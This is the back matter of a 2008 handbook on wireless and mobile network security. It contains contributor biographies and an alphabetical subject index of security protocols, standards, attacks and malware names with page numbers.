Christos Xenakis received his BSc degree in computer science in 1993 and his MSc degree in telecommunication and computer networks in 1996, both from the Department of Informatics and Telecommunications, University of Athens, Greece. In 2004 he received his PhD from the University of Athens (Department of Informatics and Telecommunications). Since 1996 he has been a member of the Communication Networks Laboratory of the University of Athens and, currently, he is the head of the Security Group. In addition, he is a lecturer (faculty of the Department of Technology Education and Digital Systems) in the University of Piraeus, Greece.

Lu Yan is a research fellow at University College London and a Visiting Fellow at University of Cambridge. Previously, he was with the Department of Information Technologies in Åbo Akademi University, the Distributed Systems Design Laboratory in Turku Centre for Computer Science (TUCS), and the Institute of Microelectronics (IME) in Peking University. He holds visiting professor positions in both École Supérieure d’Ingénieurs généralistes (ESIGELEC) and École Supérieure de Commerce de Rouen (ESC).

Laurence T. Yang is a professor in computer science at St Francis Xavier University, Canada. His research includes high performance computing and networking, embedded systems, ubiquitous/pervasive computing, and intelligence. He has published around 250 papers in refereed journals, conference proceedings, and book chapters in these areas. He has been involved in more than 100 conferences and workshops as a program/general conference chair and more than 200 conferences and workshops as a program committee member. He served as the vice-chair of IEEE Technical Committee of Supercomputing Applications (TCSA) until 2004. Currently he is on the executive committee of IEEE Technical Committee of Scalable Computing (TCSC), of IEEE Technical Committee of Self-Organization and Cybernetics for Informatics, of IFIP Working Group 10.2 on Embedded Systems, and of IEEE Technical Committee of Granular Computing. He is also the co-chair of IEEE Task Force on Intelligent Ubiquitous Computing. In addition, he is the editor-in-chief of nine international journals and a few book series. He is serving as an editor for around 20 international journals. He has been acting as an author/co-author or an editor/co-editor of 30 books from Kluwer, Springer, Nova Science, American Scientific Publishers, and John Wiley & Sons. He has received three Best Paper Awards, as well as the following: IEEE 20th International Conference on Advanced Information Networking and Applications (AINA-06); one IEEE Best Paper Award, 2007; one IEEE Outstanding Paper Award, 2007; Distinguished Achievement Award, 2005; Distinguished Contribution Award, 2004; Outstanding Achievement Award, 2002; Canada Foundation for Innovation Award, 2003; and University Research/Publication/Teaching Award 00-02/02-04/04-06.

Hao Yin is currently an associate professor with the Department of Computer Science and Technology, Tsinghua University, Beijing, China. He received his PhD degree in electrical engineering from Huazhong University of Science and Technology, China, in 2002. His research interests span broad aspects of network architecture, P2P technology, wireless networks, video coding, multimedia communication over wireless networks, and network security. He has published over 50 papers in refereed journals and conferences. He is on the editorial boards of Advances in Multimedia and the Ad Hoc Networks journal, and has been involved in organizing over 12 conferences.

Rong Yu was born in Guangdong, China, in 1979. He received his BE degree in communications engineering from Beijing University of Posts and Telecommunications (BUPT), Beijing, China, in 2002. After that, he joined the Electronic Engineering Department of Tsinghua University, Beijing, China, where he received his PhD degree in July 2007. His research interests include protocol design and performance analysis of wireless sensor networks and broadband wireless multimedia networks.

Zhen Yu is a PhD candidate in the Department of Electrical and Computer Engineering at Iowa State University. He obtained his BEng (1995) and MEng (2001) in electrical engineering from Shanghai Jiao Tong University, China. He also received his MS in electrical engineering from Iowa State University in 2003. Since then he has been researching security issues in wireless networks and distributed systems.

Said Zaghloul is currently a PhD candidate at the Technical University Carolo-Wilhelmina in Braunschweig, Germany. Prior to his PhD studies, he was with Sprint-Nextel as a telecommunication design engineer mainly focusing on wireless IP infrastructures. During his employment at Sprint-Nextel, he submitted two patents in the area of telecommunication protocols and received excellence awards. In 02, he received the first IEE award for his BSc graduation project in UMTS capacity planning. In 2003, he was granted a Fulbright Scholarship to pursue his MSc studies at the University of Kansas. In 2005, Mr. Zaghloul received his MSc degree with honors. His research interests include wireless protocols, IP technologies, and wireless communications.

Guo-Mei Zhu received the BE degree in communication engineering from ChongQing University of Posts and Telecommunications, Chongqing, China, in 2002. She is currently pursuing her PhD degree at the School of Telecommunication Engineering, Beijing University of Posts and Telecommunications, Beijing, China, under the supervision of Professor Geng-Sheng Kuo. Her current research interests include distributed intrusion detection for wireless networks, cross-layer communication protocol design for wireless networks, next generation wireless networks, and wireless mesh networks.

Albert Y. Zomaya is currently the head of school and the CISCO Systems chair professor of internetworking in the School of Information Technologies, The University of Sydney. He is the author/co-author of more than 300 publications and serves as an associate editor for several leading journals. Professor Zomaya is the recipient of the Meritorious Service Award (in 2000) and the Golden Core Recognition (in 2006), both from the IEEE Computer Society. He is a chartered engineer (CEng), a fellow of the American Association for the Advancement of Science, the IEEE, and the Institution of Electrical Engineers (U.K.), and a distinguished engineer of the ACM.

Aneta Zwierko holds MSc and PhD degrees in telecommunications from Warsaw University of Technology, Poland. Her doctoral thesis “Cryptographic Protocols for Mobile Agent Systems with Applications” concerned the application of cryptographic protocols in mobile environments for providing integrity, anonymity, and more complex services such as secure e-voting. Her current interests include zero-knowledge proofs and their application, identification and authentication protocols, anonymity and privacy in the agent systems, E/M-voting protocols, electronic payments, and AI and its application in security.




Index

Symbols
(3G) cellular networks 364
(AKC) protocol 215
3GPP mobile broadcast/multicast service (MBMS) 388
3GPP mobile broadcast multicast (MBMS) 384
3rd Generation Partnership Project (3GPP) 297
3rd generation partnership project (3GPP) 318
4G security layer 288
4G security measures 286
4G vulnerabilities 286

A
AA-Mobile-Router-Answer (AMA) 401
AA-Mobile-Router-Local-Answer (AMLA) 402
AA-Mobile-Router-Request (AMR) 401
AA-Registration-Answer Command (ARA) 398
AA-Registration-Request Command (ARR) 398
AAA server 715
access control 45, 501
access networks (ANs) 280
access point (AP) 78, 777
access point (AP), rogue 80
access points (AP) 441, 711
acknowledgement (ACK) 418
active tag 725
additional authentication data (AAD) 785
address resolution protocol (ARP) 373, 749
ad hoc 661
ad hoc collaborations 461
ad hoc gateway access control (AGAC) 509
ad hoc key distribution center (AKDC) 500, 509
ad hoc network 652
ad hoc networks (ARAN) 420
ad hoc on-demand distance vector routing (AODV) 435, 640
advanced encryption standard (AES) 304, 762, 784
AES encryption mode 768
Airespace network 716
All-IP 283
ambient resource-constrained wireless computing nodes 636
American mobile phone system (AMPS) 273
anomaly detection model 88
anomaly detection module (ADM) 540
anonymity 183
anonymous authentication protocol (ANAP) 450
anonymous dynamic source routing protocol (AnonDSR) 438
anonymous on-demand routing (ANODR) 439
anonymous routing protocol for mobile ad hoc networks (ARM) 440
Application interface (Ua) 384

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
application program interface (API) 283
asymmetric cryptography 575
auditing 46
authentication 45, 148, 501
authentication, and cellular networks 197
authentication, and wireless networks 193
authentication, authorisation, and accounting (AAA) system 176–188
authentication, authorization, accounting (AAA) 298
authentication, authorization, and accounting (AAA) 395, 396
authentication, authorization, and accounting (AAA) system 158–175
authentication, authorization, and accounting framework (AAA) 283
authentication, password 195
authentication, subscriber 177
authentication algorithm 367
Authentication and key agreement (AKA) 764
authentication and key agreement (AKA) 146, 341, 383
authentication authorization and accounting (AAA) 776
Authentication center (AuC) 341
authentication center (AuC) 290
authentication centre (AuC) 320, 352
authentication data request (ADR) 342
authentication header (AH) 680
authentication key (AK) 766
authentication management 193
authentication reply (ARep) 398
authentication request (AReq) 398
authentication server 14
authentication vectors (AVs) 381
authorisation 45
authorization key (AK) 201

B
bandwidth 29
base station (BS) 365, 766
beyond third generation (B3G) 297
beyond third generation (B3G) mobile networks 297
binding acknowledgment (BA) 202
binding update (BU) 202
black-box protection 30
block RAM (BRAM) 266
Bluetooth 6–7, 15, 203, 283
bootstrapping 192
bootstrapping interface (Ub) 383
border gateway protocol (BGP) 369
broadband wireless access (BWA) 766
broadband wireless networks 11
Burmester-Desmedt (BD) 495
bursting of the Internet bubble 277

C
CableLabs 391
Canetti-Krawczyk (CK) model 210
care-of-address (CoA) 396
CBC-MAC protocol (CCMP) 304
CCMP protocol 307
cellular system 759
cellular system, and vulnerabilities in 81
certificate authorities (CA) 147, 311
certificate authority (CA) 375, 714
certificate revocation list (CRL) 704
certificate revocation list (CRL) 484
certification authority (CA) 483
certifying authority (CA) 451
challenge handshake authentication protocol (CHAP) 160, 388, 779
channel jamming 130
cipher block chaining (CBC) 766
circuit switched (CS) 321
CK model 210
clear-to-send (CTS) 418
cluster, formation of 85
cluster-based network 658
Cluster formation 641
cluster heads (CHs) 629
code division multiple access (CDMA) 364, 388
code division multiple access 2000 (CDMA2000) 339
COMITY trust model 472
common security functions (CSF) 390
communication, eavesdropping 131
communication, faking / replay attack 131
communication, man-in-the-middle attack 131
communication, near field (NFC) 104
communication, securing of 146
communication, wireless 129
commutative cipher-based en-route filtering (CCEF) 630, 634
commutative watermarking and encryption (CWE) 249
complementary code-keying (CCK) 520
compromised nodes 629
computational trust 646
cone-based topology control (CBTC) 655
Conférence européenne des Administrations des Postes et des Télécommunications (CEPT) 273
CONFIDANT 421
confidentiality 500
context-based middleware for trustworthy services (COMITY) 470
converged network, and AAA 178
converged network, and authentication 181
CORE 421
core network (CN) 284, 352, 763
correspondent nodes (CNs) 396
counter mode (CM) 762
counter mode with cipher block chaining message authentication code protocol (CCMP) 373
credential (CR) 400
credential fetching interface (Zh) 383
credit clearance service (CCS) 421
critical transmission range (CTR) 654
cryptographic 649
cryptographic keying material 636
cryptographic protocols 210
Cryptographic solutions 644
cryptography 211, 482, 680

D
Data encryption standard (DES) 766
data encryption standard (DES) 575
data integrity 501
data over cable service interface specification for baseline privacy + interface (DOCSIS BPI+) 373
data protection 313
data protection-802.11i standard 304
decentralized key generation and distribution (DKGD) 500, 509
decentralized trust model 486
denial-of-service (DoS) 419, 451, 600, 762, 783
denial-of-service attacks 644
denial-of-service attacks (DoS) 699
denial of service (DoS) 82, 373
destination-sequenced distance-vector (DSDV) 419
device driver 62
Diameter 158
Dictionary attack 783
Diffie-Hellman (DH) 483
Diffie-Hellman (DH) key exchange 146
Digital certificate 209
digital fingerprint 209
digital rights management (DRM) 145, 237
Digital signature 209
digital signature 34, 416
direct current (DC) 521
directed diffusion (DD) 642
direction bit (DIRECTION) 356
Direct sequence spread spectrum (DSSS) 760
discount anonymous on-demand routing (discount ANODR) 440
distributed anonymous secure routing protocol (ASRP) 441
distributed key predistribution scheme (DKPS) 491
distributing system (DS) 697
distribution of authentication vector (DAV) 342
domain name system (DNS) 309
dynamic clustering technique 641
dynamic en-route filtering (DEF) 630, 634
dynamic host configuration protocol (DHCP) 777
Dynamic keying 645
dynamic name system (DNS) 369
Dynamic source routing (DSR) 419
dynamic source routing (DSR) 435

E
e-banking 760
e-commerce 760
e-government 760
E2E security 371
EAP authentication 783
EAP protocol 776
eavesdropping 33, 131
electromagnetic susceptibility (EMS) 684
elliptic curve cryptography (ECC) 576
encapsulating security payload (ESP) 313, 680
encapsulation security payload (ESP) 325
encrypted function 31
encryption 65
encryption, communication compliant 243
encryption, format independent 239
encryption, multimedia 236–255
encryption, partial audio 241
encryption, partial image 241
encryption, partial video 242
encryption method 779
end-to-end (E2E) 747
end-to-end transmission 420
energy starvation attack 643
entire enterprise 716
entity recognition (ER) 646
equipment identity register (EIR) 320, 352
error-correcting codes (ECC) 248
Euclidean distance 654
European Telecommunications Standards Institute (ETSI) 300
exclusion-basis systems (EBS) 603
exclusion basis systems (EBS) 646
expected response (XRES) 322
extended service set (ESS) 697, 715
extensible authentication protocol (EAP) 711, 761, 776
extensible authentication protocol method for GSM subscriber identity modules (EAP-SIM) 299

F
fair MAC (FAIRMAC) 418
False Data Injection Attack 635
fault tolerance 652
field-programmable gate array (FPGA) 257
fingerprinting 33
firewalls 95
firewalls, port-blocking 99
firewalls, unidirectional 97
first-in-first-out (FIFO) 342
first hand information (FHI) 610
flat structure 656
format independent encryption algorithm 239
forward error correction (FEC) 243
fourth generation (4G) 272, 276, 391, 759
frame check sequence (FCS) 308
frequency ranges for the next generation of PLMN (FPLMTS) 274
frequent handoff region (FHR) 716
Full-IP 283

G
Gabriel graph (GG) 656
gateway general packet radio service (GPRS) 160
Gateway GPRS support node (GGSN) 299, 341
gateway GPRS support node (GGSN) 320, 368, 381
gateway GSN (GGSN) 353
GBA user security settings (GUSS) 384
GEA supports and the network (SGSN) 355
GEA using the encryption key (GPRS-Kc) 355
general packet radio service (GPRS) 344
general packet radio service (GPRS) 145, 300, 320, 763
general packet radio service (GPRS) 364
general packet radio services (GPRS) 351
generation partnership project (3GPP) 379
generic authentication architecture (GAA) 386
generic bootstrapping architecture (GBA) 379, 382
Geometric topology 656
global MS Passport service 285
global positioning system (GPS) 587
global system for mobile communications (GSM) 246, 273, 300, 320, 339, 351, 364, 760
Gnutella 96
GPRS ciphering algorithm (GPRS-A5) 355
GPRS encryption algorithm (GEA) 355
GPRS mobility management (GMM) 344
GPRS network architecture 352
GPRS support nodes (GSN) 352
GPRS tunneling protocol (GTP) 324, 353
Gradient-based routing (GBR) 641
group-to-group (G2G) 602
group Diffie-Hellman (GDH) 492, 494
group key handshakes 304
group of pictures (GOP) 521
group temporal key (GTK) 304
GSM user authentication protocol (GUAP) 367
guests 282

H
Handoffs 721
hash certification protocol 218
Hash function 209
hash function 417
hash function-based message authentication code (HMAC) 483
heterogeneous security 287, 288
heterogeneous sensor networks 634
hierarchical structure 656
high speed downlink packet access (HSDPA) 275
high speed packet access (HSPA) 763
Home-Agent-MIPv6-Answer Command (HOA) 398
Home-Agent-MIPv6-Request Command (HOR) 398
home address (HoA) 396
home agent (HA) 396
home environment (HE) 319
Home location register (HLR) 340
home location register (HLR) 299, 320, 352, 763
home location register-authentication center (HLR-AuC) 382
home provider 281
home subscriber server (HSS) 343, 382
home subscriber service (HSS) 299
human notion trust 646
hybrid trust model 487

I
identification (ID) 633, 724
identities of mobile users (IMSI) 360
identity, digital 46
identity, user 54–55
identity-based cryptography (IBC) 602, 612
identity management 44–60
identity management, for wireless service access 104–114
identity management, pros and cons 47–48
identity management, solutions & controversies 107
identity management systems, requirements of 107
identity management systems, security infrastructure 110
IEEE 802.11, and security 64
IEEE 802.11, family protocols 449
IEEE 802.16e (Mobile-WiMAX) 364
improved wired equivalent privacy (IWEP) 240
individual subscriber authentication key (ISAK) 370
infection vector 6–7
Information Society Technologies [IST] 396
information systems (ISs) 724
ingress anti-spoofing (ISA) 372
input (INPUT) 356
instant messaging (IM) 281
integrated circuits (ICs) 723
integrity check value (ICV) 698
interleaved hop-by-hop authentication (IHA) 630, 634
international mobile subscriber identity (IMSI) 354, 365, 763
international mobile telecommunications-2000 (IMT-2000) 339
International Organization for Standardization (ISO) 257
International Organization for Standardization (ISO/IEC, 2003) 256
International Telecommunications Union (ITU) 274
Internet Control Message Protocol (ICMP) 400
Internet Engineering Task Force (IETF) 283, 384, 395, 418
Internet Engineering Task Force (IETF), Diameter 158
Internet key exchange (IKE) 325
Internet protocol (IP) 779
Internet service providers (ISPs) 397
interrogating call session control function (I-CSCF) 343
intrusion, prevention 90
intrusion detection system (IDS) 531
intrusion detection systems (IDS) 79, 424
IP multimedia subsystem (IMS) 340, 390
IP security (IPsec) 239, 282
items of interest (IOIs) 432

K
“KiloByte” SSL (KSSL) 332
k-connectivity 655
k-fault tolerance 655
k-nearest neighbor (KNN) 598
Kaman 200
key (K) 321
key-compromise impersonation (KCI) 228
key-exchange (KE) protocols 211
key distribution center (KDC) 483
key distribution interface (Zn) 384
Key encryption key (KEK) 766
key encryption key (KEK) 483
key generation center (KGC) 217
key pool 645
key ring 645
key translation centers (KTC) 485
kilobyte 723

L
LAN applications 776
layered attacks 502
LEAP protocol 554
least mean square (LMS) 619
light-weight hop-by-hop authentication protocol (LHAP) 422
linear programming (LP) 620, 655
local area networks (LANs) 776
local fixed nodes (LFNs) 396
local handshake protocol 715
local IDS (LIDS) 424
local minimum spanning tree (LMST) 656
location-aware end-to-end data security (LEDS) 630, 634
location-based keys (LBKs) 602
location-based resilient security (LBRS) 630, 634
location area identity (LAI) 199
Locknut 5
logical key hierarchy (LKH) 492
long term evolution (LTE) 391
low density parity check (LDPC) 766

M
machine-to-machine (M2M) 277
malicious software, in mobile devices 1–10
malware 1
malware, defenses 7–8
malware, evolution of 4
malware, non-replicating 2
man-in-the-middle (MITM) 367, 779
man-in-the-middle (MITM) attack 130
MANET, distributed reputation for secure 453
MANET, security requirements 505
MANET node 637
MANET routing, attacks on 419
MANETs, key management in 483
MANETs, key management schemes in 487
MANETs, secure routing challenges 507
MANETs, security challenges 416
MANETs, security services 415
MANETs, vulnerabilities 414
man in the middle (MITM) 82
MASK 439
master key (MK) 714
media access 145
media access control (MAC) 198
medium access control (MAC) 414, 714, 749
medium access protocol 569
message authentication code (MAC) 32, 603
message authentication codes (MACs) 630
message integrity code (MIC) 136, 700
Michael MIC 136
minimum cost forwarding algorithm (MCFA) 641
misbehavior detection module (MDM) 540
mix route algorithm (MRA) 443
Mobile-IP ad hoc networks (MANETs) 500
mobile-WiMAX (IEEE 802.16e) 373
mobile ad hoc network (MANET) 413
mobile ad hoc network (MANET), security approaches to 413
mobile ad hoc networks (MANET) 449, 450, 462
mobile ad hoc networks (MANETs) 461, 479, 480, 637
mobile agent, strong 29
mobile agent, weakly 29
mobile application part (MAP) 309, 324
mobile broadband 759
mobile broadband wireless access (MBWA) 759
mobile certificate authority (MOCA) 489
mobile code, security 28–43
mobile devices, and malicious software 1–10
mobile devices, Internet access from 6
mobile equipment (ME) 382
mobile multimedia services (MMS) 298
mobile network (MONET) 396
mobile network, and trust management 191
mobile network nodes (MNNs) 396
mobile network prefix [MNP] 396
mobile node (MN) 202, 397, 711
mobile service switching centre (MSC) 352
mobile station (MS) 320
mobile stations (MSs) 500
mobile system, and access control 176–188
mobile system, and authentication 176–188
mobile system, and authorisation 176–188
monitoring technique 417
multimedia, distribution 249
multimedia, sharing 248
multimedia encryption, and multimedia watermarking 248
multimedia encryption, in wireless environment 236–255
multimedia encryption, requirements of 238
multimedia watermarking, and multimedia encryption 248
multiple description code (MDC) 248

N
National Institute of Standards and Technology (NIST) 256
National Security Agency (NSA) 257
near field communication (NFC) 104
Neighbor Graph 721
network-oriented design 280
network-to-network (N2N) 277
Network Access Control 721
network access servers (NAS) 298
network address translation (NAT) 356, 373
network application function (NAF) 382
network convergence 178
network domain security (NDS) 324
network entities (NEs) 325
network interface card (NIC) 700
network layer 768
network mobility (NEMO) 184, 395
Network Performance 680
networks 281
network selection 289
new AP (nAP) 715
new European schemes for signatures, integrity, and encryption (NESSIE) 257
new SGSN (SGSNn) 342
Newsham, Tim 68
next generation networks (NGN) 391, 776
node, malicious 419
node, selfish 419
node MAC 632
nonrepudiation 501
Nordic mobile telephony (NMT) 273

O
old AP (oAP) 715
old SGSN (SGSNo) 342
OMA broadcast (BCAST) 386
OMA broadcast smart card service protection profile 379
on-demand protocol 518
one-way function trees (OFT) 493
online certificate status protocol (OCSP) 704
open mobile alliance (OMA) 379
open system authentication (OSA) 697
over-the-air (OTA) 380
over the air service provisioning (OTASP) 372

P
packed data gateway (PDG) 298
packet binary convolutional coding (PBCC) 520
packet core 372
packet data network (PDN) 352
packet data protocol (PDP) 344, 353
packet forwarding attacks 419
packet radio network (PRNET) 640
packet switch (PS) 298
packet switched (PS) 321
pair-wise master key (PMK) 714
pair-wise master key (PMK) 702
pairwise transient key (PTK) 304
passive tag 725
password authentication 195
password authentication protocol (PAP) 160, 779
path key establishment 645
peer-to-peer (P2P) network, and security 95–103
peer-to-peer paradigm (P2P) 438
peer intermediaries for key establishment (PIKE) 491
perfect forward secrecy (PFS) 290
perimeter security (PS) 373
personal area network (PAN) 13, 148, 396
personal area networks (PAN) 277
point-to-point protocol (PPP) 777
policy decision points (PDP) 282
policy enforcement points (PEP) 282
polynomial share 645
port access entity (PAE) 701
power control 652
presence and availability working Group (PAG) 389
presence and availability working group (PAG) 390
pretty good privacy (PGP) 483
Privacy 209
privacy 115
privacy, and authentication 14
privacy, and authorization 14
privacy, and security 14
privacy, and trust 14
privacy-enhancing techniques 115–128
privacy key management (PKM) 201
privacy key management for extensible authentication protocol (PKM-EAP) 373
privacy preserving routing (PPR) 441
privacy protection 116
proactive key caching (PKC) 716
probabilistic forwarding (PFR) 642
protected EAP (PEAP) 375
protected extensible authentication protocol (PEAP) 777
protocol environments 211
proxy call session control function (P-CSCF) 343
pseudo-random number generator (PRNG) 698
pseudonyms, and identity 120
public-key cryptography 571
public-key cryptography (PKC) 612
public access wireless networks (PAWNs) 285
public key certificates (PKC) 205
public key infrastructure (PKI) 256, 386, 484, 485, 766, 781
public key interface (PKI) 388
public land mobile network (PLMN) 298, 367
public land mobile networks (PLMN) 273
public switched telephone network (PSTN) 284

Q
quality of protection (QoP) 240
quality of service (QoS) 105, 240, 280, 344, 500, 766

R
radio-frequency identification (RFID) 723
radio access network (RAN) 340
radio access networks (RANs) 277
radio frequency fingerprinting (RFF) 84
radio network controller (RNC) 320, 340, 365, 763
radio network service node (RNSN) 376
RADIUS protocol 196
random challenge (GPRS-RAND) 355
random number (RAND) 322
reactive routing protocols 640
registration authority (RA) 486
related signed response (GPRS-SRES) 355
relative neighborhood graph (RNG) 656
remote authentication dial in user service (RADIUS) 14, 158, 776
removable user identity module (R-UIM) 388
repeater stations (RSs) 201
replay attack 419
reputation mechanisms 417
request-to-send (RTS) 418
residential gateways (RG) 711
rfmon 63
roaming agreements 281
Ron’s Cipher #4 (RC4) 240
round trip times (RTT) 275
group temporal key (GTK) 702
router advertisement (RA) 398
route reply (RREP) 435
route request (RREQ) 419, 435
routing area identity (RAI) 354

S
scanning, passive 81
second-generation (2G) 339
second generation (2G) 274, 319, 351
second hand information (SHI) 610
secure ad hoc distance vector (SAODV) 522
secure and efficient key management (SEKM) 510
secure AODV (SAODV) 420
secure communication 779
secure directed diffusion (SDD) 644
secure distributed anonymous routing protocol (SDAR) 439
secure efficient ad hoc distance vector routing protocol (SEAD) 420
secure hash algorithm-1 (SHA-1) 257
secure network encryption protocol (SNEP) 603
secure positioning for sensor networks (SPINE) 572
Secure routing 588
secure routing protocol (SRP) 420, 451, 488
secure service discovery 11–27
secure socket layer (SSL) 198, 239, 364, 373
secure transient association 422
secure user plane location (SUPL) 390
security, and multimedia watermarking 239
security, authentication 189
security, black-box 30
security, firewall issues 95–103
security, infrastructure-based 15
security, in home networks 184
security, in wireless environment 183
security, P2P 95–103
security, requirements in wireless environments 79
security, smart space dependent 18
security, tamper resistant storage 148
Security Architecture 766
security architecture 760
security association (SA) 398
security association identifier (SAID) 766
security attacks 481
security gateways (SEGs) 325
security goals 481
security mechanisms 725
security parameter establishment (SPE) 438
Security Parameter Index (SPI) 202
security protocol 764
security protocols 776
Security Service 731
security services 725
security sublayer 750
self-organized CA (SOCA) 510
self-protection problem 660
semantic access control policies 469
semantic context-driven access control 467
sensor applications 652
sensor coverage 652
sensor network 568, 652
sensor protocols for information via negotiation (SPIN) 642
service-oriented 280
service contract 281
service discovery and advertisement (SDA) 11
service orientation 11
service provider 57–58
service provider networks (SPNs) 281
service providers 281
services 281
service set identification (SSID) 289
service set identifier (SSID) detection 81
serving call-session-control-function (S-CSCF) 381
serving call session control function (S-CSCF) 343
Serving GPRS support node (SGSN) 299
serving GPRS support node (SGSN) 320, 341, 368
serving GSN (SGSN) 352
serving network (SN) 319, 355
Session hijack 783
session initiation protocol (SIP) 340
session MAC 632
shared key authentication (SKA) 697
shared key discovery phase 645
short message service (SMS) 274, 380
signaling system 7 (SS7) 356
Signalling System 7 (SS7) 180
signed response (GPRS-SRES) 355
single sign-on 55–56
single sign-on (SSO) protocol 178
sink hole attack 644
skinny tree (STR) 495
sleep deprivation attack 643
Sleeper protocol 18
smart card 153
sniffing 81
software agent 28
spoofing 82
Sprite 421
SSRD protocol 19
Static keying 645
stationary secure database (SSD) 540
Statistic en-route filtering mechanism (SEF) 630
subscriber identity module (SIM) 353, 354, 380, 783
subscriber stateful firewall (SSF) 372
subscriber station (SS) 766
support of the current serving GSN (SGSN) 763
Sybil attack 444, 644
Symmetric cryptography 575
system-on-chip design 256
system architecture evolution (SAE) 391
system design 652

T
tag’s identity 725
tags 723
Statistic en-route filtering (SEF) 634
telecoms & Internet converged services & protocols for advanced networks (TISPAN) 390
temporal key integrity protocol (TKIP) 304, 700, 780, 784
temporary identities (TMSI, TLLI) 360
temporary logical link identity (TLLI) 354
temporary mobile subscriber identities (TMSI) 763
temporary mobile subscriber identity (TMSI) 199, 354
third generation (3G) 318
threat protection system (TPS) 373
three-party key-distribution (3PKD) 217
ticket granting server (TGS) 200
time-to-live (TTL) 557
time division-synchronous CDMA (TD-SCDMA) 339
time division multiple access (TDMA) 273, 641, 767
time division multiplex (TDM) 683
topologically-inspired attack 643
topology 654
topology control 652
topology design 661
total access communication system (TACS) 273
TRAFFIC 422
traffic 130
transmission control protocol (TCP) 162
transport encryption key (TEK) 766
transport layer security (TLS) 328, 364, 386, 711, 712, 752, 767
transport layer security (TLS) protocol 162
tree-based group Diffie-Hellman (TGDH) 494
triple data encryption standard (3DES) 240
Trojan horse, Drever 5
Trojan horse, Locknut 5
Trojan horse, Skuller 5
trust, definition and principles 464
Trust Cloud 721
trust context 646
trusted third party 56–57
trusted third party (TTP) 423, 483
Trust Link 721
trust management 190, 461, 464, 636
trust management, advances in 191–192
trust management, systems 465
trust models 484
trust packet acknowledgment (TPA) 648
trust packet precision (TPP) 648
tunneled TLS (TTLS) 375


U

ubiquitous and robust access control (URSA) 488
UC security model 211
UMTS integrated circuit card (UICC) 327
UMTS subscribers identity module (USIM) 300
UMTS terrestrial radio access network (UTRAN) 320
universal integrated circuit card (UICC) 381
Universal mobile telecommunications system (UMTS) 339, 763
universal mobile telecommunications system (UMTS) 146, 299, 759, 760
universal mobile telecommunication system (UMTS) 318
universal SIM (USIM) 380
user-oriented design 280
user datagram protocol (UDP) 309
user equipment (UE) 340, 382
users 281
user service identity module (USIM) 321
user terminal (UT) 340
USIM application toolkit (3GPP TS 33.111, 2001) 327

V

vehicular ad hoc networks (VANET) 450, 457
vehicular area network (VAN) 396
verifiable multilateration (VM) 571
vertical handover 286
very large-scale integration (VLSI) 256, 274, 364
VHSIC hardware description language (VHDL) 265
video encryption algorithm (VEA) 242
video object plane (VOP) 242
video on demand (VoD) 176
virtual operators (VOs) 281
virtual private network (VPN) 198, 282, 300, 357, 373, 747, 768
virtual private networks (VPNs) 198, 324
virtual backbone 656
visiting location register (VLR) 347
Visiting Mobile Node (VMN) 403
visiting mobile nodes (VMNs) 396
visitor location register (VLR) 352, 763
visitors 281
voice over IP (VoIP) 176, 368

W

war driving 131
wardriving, wireless 61–77
watermarking 32
watermarking, and imperceptibility 238
watermarking, and security 238
watermarking, in wireless environment 236–255
watermarking, lightweight 246
watermarking algorithm, for wireless multimedia 245
web-of-trust model 486
Web services (WS) 384
Wi-Fi protected access (WPA) 132, 697, 699, 761, 784
Wi-Fi security protocol 766
wideband code division multiple access (W-CDMA) 275
wideband code division multiple access (WCDMA) 320
WiFi network 291
wired equivalence privacy (WEP) 780
wired equivalent privacy (WEP) 131, 240, 761
wireless access gateway (WAG) 298
wireless application layer (WAL) 284
wireless application protocol (WAP) 298, 368
wireless area network (WAN) 13
wireless environment, multimedia encryption and watermarking 236–255
wireless interface 62–77
wireless intrusion detection system (WIDS) 78
wireless intrusion tracking system (WITS) 88
wireless LAN (WLAN) 346
wireless LAN (WLAN) 210, 240, 272
wireless LANs (WLANs) 297
wireless MAC security 417
wireless metropolitan area networks (WMAN) 347
wireless metropolitan area networks (WMANs) 760


wireless multimedia, and encryption algorithms 239
wireless multimedia, and watermarking algorithms 245
Wireless network 209
wireless network 189
wireless network, and authentication 193
Wireless Networks 721
wireless networks, and security challenges 130
wireless networks, and threats in 79
wireless networks, and vulnerabilities 129–144
wireless networks, channel jamming 130
wireless networks, illicit use of 81
wireless networks, intrusion and anomaly detection in 78–94
wireless networks, passive scanning 81
wireless networks, service set identifier detection 81
wireless networks, sniffing 81
wireless networks, spoofing 82
wireless networks, traffic analysis 130
wireless networks, unauthorized access 130
wireless routing protocols 504
Wireless security 724
Wireless Sensor Network (WSN) 209
Wireless sensor networks (WSN) 628
wireless sensor networks (WSN) 617
wireless sensor networks (WSNs) 565
wireless service access, and identity management 104–114
wireless transport layer security (WTLS) 328, 368
wireless wardriving 61–77
wireless wide area network (WWAN) 347
WLAN 721
WLAN-access gateway (WLAN-AG) 298
WLAN-access point name (W-APN) 299
WLAN authentication and privacy infrastructure (WAPI) 210
worldwide interoperability for microwave access (WiMAX) 776
worm, Cabir 4
worm, Mabir 5
wormhole attack 419, 644
wormhole attacks 648

X

XML configuration access protocol (XCAP) 391
XML document management (XDM) 390

Y

Yao graph (YG) 656

Z

zone-based IDS (ZBIDS) 425

